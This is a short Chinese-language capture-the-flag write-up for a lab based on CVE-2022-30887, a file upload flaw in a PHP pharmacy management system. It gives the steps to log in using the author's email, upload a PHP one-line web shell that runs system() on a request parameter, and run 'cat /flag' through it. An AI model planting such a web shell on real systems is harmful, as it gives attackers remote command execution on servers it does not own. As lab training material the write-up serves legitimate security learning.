春秋云镜-CVE-2022-30887

多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口，客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库，并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞，进而导致任意代码执行。

进入环境是一个登录页面，尝试了一下密码重置，但是没有跳转。

1.使用社工方法

点击下方的作者，然后进入作者的主页，点击一个项目，上面出现作者的邮件

2.在Medicine的栏目上选择“Add Medicine”，上传shell.php

是一句话shell

<?php
if($_REQUEST['cmd']) {
  system($_REQUEST['cmd']);
  } else phpinfo();
?>

 3.上传成功后会，转到Manage Medicine栏目，复制刚刚上传的图片的地址，并访问。

成功phpinfo

4.直接传cmd

your-url/assets/myimages/shell.php?cmd=cat /flag

5.Get Flag